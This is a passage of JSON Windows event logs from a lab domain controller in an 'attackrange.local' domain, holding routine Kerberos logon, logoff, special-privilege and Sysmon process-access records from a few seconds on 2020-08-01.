T4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220447,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x65BBD\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x65bbd","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220448,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tDelegation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x65BBD\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::286a:52de:ea43:8266\r\n\tSource Port:\t\t50147\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x65bbd","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::286a:52de:ea43:8266","IpPort":"50147","ImpersonationLevel":"%%1840","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220449,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x65B4A\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x65b4a","LogonType":"3","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220450,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x65B00\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x65b00","LogonType":"3","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4332,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:48.017\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:48.017","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4333,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:48.017\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:48.017","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4334,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:48.017\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:48.017","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220451,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x659F3\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x659f3","LogonType":"3","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:49","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220452,"ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x65EB5\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x65eb5","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:49","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220453,"ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x65EB5\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::286a:52de:ea43:8266\r\n\tSource Port:\t\t50150\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x65eb5","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::286a:52de:ea43:8266","IpPort":"50150","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4335,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.001\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 420\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.001","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"420","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 